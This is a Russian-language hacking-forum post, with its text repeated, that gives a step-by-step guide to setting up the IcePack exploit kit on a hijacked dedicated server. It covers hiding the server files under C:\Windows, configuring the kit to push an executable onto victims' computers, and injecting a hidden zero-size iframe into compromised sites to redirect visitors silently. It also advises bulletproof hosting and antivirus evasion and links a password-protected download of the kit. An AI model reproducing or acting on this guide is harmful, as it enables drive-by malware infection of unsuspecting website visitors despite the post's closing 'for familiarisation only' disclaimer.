Friend
Professional
- Messages
- 2,653
- Reaction score
- 842
- Points
- 113
Я долго думал , писать эту статью или нет , и вот всё таки решил написать лёгкую статейку по этой теме. Для начала скажу что опытные связководы эксплойтов ничего нового из этой статьи для себя не почерпнут , а новичками или просто людям которым это интересно думаю можно почитать
Что такое ICEPACK можно прочитать здесь .
Ну пожалуй начнём , и так допустим вы имеете дедик и желательно заброшенный , так же дедик должен иметь белый ip адрес , узнать это просто , заходим в Пуск=Выполнить-cmd.exe , далее в смd пишем:
вывод команды ipconfig должен быть таким :
ip адрес закрашен и изменён , но думаю суть ясна.
Теперь нам будут нужны Apache+PHP+Mysql , для этого можно выбрать к примеру Vertrigo , он легок , просто в использовании и имеет всё что нам будет нужно для работы ,
и всё в одном флаконе, скачаем его от сюда.
Так же хочу отметить что Vertrigo очень просто в установке , устанавливается он двумя кликами .
После того как мы скачали и установили Vertrigo .. хочу заметить , что папку для установки лучше выбрать в директории C:\Windows ... чем не заметней ,тем лучше.
После того как мы всё это проделали , ищем в интернете IcePack Platinum Edition 2007 by IDT Group я специально не размещаю ссылку на него здесь так как IcePack является вредоносным ПО , распаковываем скаченный архив и копируем содержимое папки icepack в C:\Windows\VertrigoServ\www
Далее нам нужно создать базу данных для нашего айспака , для этого в браузере прописываем ip нашего дедики , например:
появится окно авторизации , по дефолту логин root пароль vertrigo , зайдя в PhpMyadmin создаём новую базу , назовём её ice.
так , база создана , идём в директорию с icepack в папку www и правим файл config.php со следующим содержанием
PHP код:
так же правим файл db.php
PHP код:
Кстати советую сменить дефолтный пароль vertrigo на свой !
Теперь всё готово и приступаем к установки IcePack , в браузере пишем
http://xx.xxx.xxx.xx/install.php установка проста до безобразия
всё готово , заходим в админку IcePack
всё готово , заходим в админку IcePack
Ну здесь всё тоже очень просто вкладка Main показывает общую конфигурацию.
Statistics показывает Refferals=рефералы , Observers=анализаторы , Loadings=какие браузеры были пробиты , The countries=страны , Operational systems= какие были OS
Work with FTP = позволяет работать с ftp аккаунтами , там тоже всё очень просто описывать не вижу смысла .
Самая интересная вкладка Tools , The Traffic=позволяет выбирать страны для блокировки трафика , через Adjustments выбираем файл который будет загружаться и запускаться на компьютере жертвы.
Как видите ничего сверхъестественного в настройке IcePack нет, в URL Script [] : прописываем ваш адрес http://xx.xxx.xx.xxx/ , в Name of the user [] : имя юзера админки , в The password of the user : пароль от админки , и File for loading [] : тут через обзор загружаем нужный нам файл и нажимаем Keep (cм скрин выше)
Ну и самое пожалуй основное это Code iFrame для чего он нужен я объясню в кратции , допустим вы получили доступ к какому либо ресурсу (сайт , форум и тд ) и имеет права для редактирования файла index , в индекс вставляется , iFrame код , незаметно для пользователя идёт перенаправление на наш заражённый адрес (URL) , в следствии чего на компьютер жервы загружается и запускается наш ехе файл.
Iframe код выглядет так :
От себя хочу сказать следующие , обычно такой софт как IcePack размещают на абузоустойчевых серверах и сам IcePack или другая связка эксплойтов не должна палиться антивирусами .
На этом думаю следует закончить , если у кого есть какие либо дополнения , милости прошу , а я наверное начинаю писать статью, как можно защититься этот такого вида угроз !
Данная статья написана с целью ознакомления и следует помнить что данные действия попадают под статьи УК.
(c) stopxakep
Несколько версии айпака: hXXp://www.sendspace.com/file/gt14rd
pass: csu
вместо Vertigo лучше использовать xampp portable - hXXp://portableapps.com/apps/development/xampp
Что такое ICEPACK можно прочитать здесь .
Ну пожалуй начнём , и так допустим вы имеете дедик и желательно заброшенный , так же дедик должен иметь белый ip адрес , узнать это просто , заходим в Пуск=Выполнить-cmd.exe , далее в смd пишем:
Code:
ipconfig/allвывод команды ipconfig должен быть таким :
Code:
C:\>ipconfig/allНастройка протокола IP для Windows Имя компьютера . . . . . . . . . : microsof-e82618 Основной DNS-суффикс . . . . . . : Тип узла. . . . . . . . . . . . . : неизвестный IP-маршрутизация включена . . . . : нет WINS-прокси включен . . . . . . . : нетПодключение по локальной сети - Ethernet адаптер: DNS-суффикс этого подключения . . : Описание . . . . . . . . . . . . : Realtek RTL8169/8110 Family GigabitEthernet NIC Физический адрес. . . . . . . . . : 00-16-17-D6-79-50 Dhcp включен. . . . . . . . . . . : да Автонастройка включена . . . . . : да IP-адрес . . . . . . . . . . . . : 61.201.88.188 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 61.201.18.1 DHCP-сервер . . . . . . . . . . . : 152.16.18.1 DNS-серверы . . . . . . . . . . . : 61.201.18.1 Аренда получена . . . . . . . . . : 29 марта 2009 г. 0:57:33 Аренда истекает . . . . . . . . . : 29 марта 2009 г. 12:57:33C:\>Теперь нам будут нужны Apache+PHP+Mysql , для этого можно выбрать к примеру Vertrigo , он легок , просто в использовании и имеет всё что нам будет нужно для работы ,
Code:
[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Компоненты:[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Apache 2.0.63[/COLOR][/SIZE]
[SIZE=3][COLOR=white]PHP 5.2.6[/COLOR][/SIZE]
[SIZE=3][COLOR=white]MySQL 5.0.51b[/COLOR][/SIZE]
[SIZE=3][COLOR=white]SQLite 3.5.9[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Smarty 2.6.19[/COLOR][/SIZE]
[SIZE=3][COLOR=white]PhpMyAdmin 2.11.7[/COLOR][/SIZE]
[SIZE=3][COLOR=white]ZendOptimizer 3.3.3[/COLOR][/SIZE]
[SIZE=3][COLOR=white]SQLiteManager 1.2.0Так же хочу отметить что Vertrigo очень просто в установке , устанавливается он двумя кликами .
После того как мы скачали и установили Vertrigo .. хочу заметить , что папку для установки лучше выбрать в директории C:\Windows ... чем не заметней ,тем лучше.
После того как мы всё это проделали , ищем в интернете IcePack Platinum Edition 2007 by IDT Group я специально не размещаю ссылку на него здесь так как IcePack является вредоносным ПО , распаковываем скаченный архив и копируем содержимое папки icepack в C:\Windows\VertrigoServ\www
Далее нам нужно создать базу данных для нашего айспака , для этого в браузере прописываем ip нашего дедики , например:
Code:
http://xx.xxx.xxx.xx/phpmyadminтак , база создана , идём в директорию с icepack в папку www и правим файл config.php со следующим содержанием
PHP код:
Code:
[/COLOR][/SIZE]
[SIZE=3][COLOR=white]<?php [/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white] [/COLOR][/SIZE]
[SIZE=3][COLOR=white]$config [/COLOR][/SIZE][SIZE=3][COLOR=white][/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]= array ( [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'main_url' => "localhost"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'admin_name' => "root"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'admin_pass' => "vertrigo"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]); [/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white] [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]?>[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]так же правим файл db.php
PHP код:
Code:
[/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]<?php [/COLOR][/SIZE]
[SIZE=3][COLOR=white]define ("DBHOST", "localhost"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBNAME", "ice"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBUSER", "root"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBPASS", "vertrigo"[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]?>[/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white]Кстати советую сменить дефолтный пароль vertrigo на свой !
Теперь всё готово и приступаем к установки IcePack , в браузере пишем
http://xx.xxx.xxx.xx/install.php установка проста до безобразия
всё готово , заходим в админку IcePack
всё готово , заходим в админку IcePack
Ну здесь всё тоже очень просто вкладка Main показывает общую конфигурацию.
Statistics показывает Refferals=рефералы , Observers=анализаторы , Loadings=какие браузеры были пробиты , The countries=страны , Operational systems= какие были OS
Work with FTP = позволяет работать с ftp аккаунтами , там тоже всё очень просто описывать не вижу смысла .
Самая интересная вкладка Tools , The Traffic=позволяет выбирать страны для блокировки трафика , через Adjustments выбираем файл который будет загружаться и запускаться на компьютере жертвы.
Как видите ничего сверхъестественного в настройке IcePack нет, в URL Script [] : прописываем ваш адрес http://xx.xxx.xx.xxx/ , в Name of the user [] : имя юзера админки , в The password of the user : пароль от админки , и File for loading [] : тут через обзор загружаем нужный нам файл и нажимаем Keep (cм скрин выше)
Ну и самое пожалуй основное это Code iFrame для чего он нужен я объясню в кратции , допустим вы получили доступ к какому либо ресурсу (сайт , форум и тд ) и имеет права для редактирования файла index , в индекс вставляется , iFrame код , незаметно для пользователя идёт перенаправление на наш заражённый адрес (URL) , в следствии чего на компьютер жервы загружается и запускается наш ехе файл.
Iframe код выглядет так :
Code:
<iframe src="заражённый url/index.php" width="0" height="0"></iframe>От себя хочу сказать следующие , обычно такой софт как IcePack размещают на абузоустойчевых серверах и сам IcePack или другая связка эксплойтов не должна палиться антивирусами .
На этом думаю следует закончить , если у кого есть какие либо дополнения , милости прошу , а я наверное начинаю писать статью, как можно защититься этот такого вида угроз !
Данная статья написана с целью ознакомления и следует помнить что данные действия попадают под статьи УК.
(c) stopxakep
Несколько версии айпака: hXXp://www.sendspace.com/file/gt14rd
pass: csu
вместо Vertigo лучше использовать xampp portable - hXXp://portableapps.com/apps/development/xampp
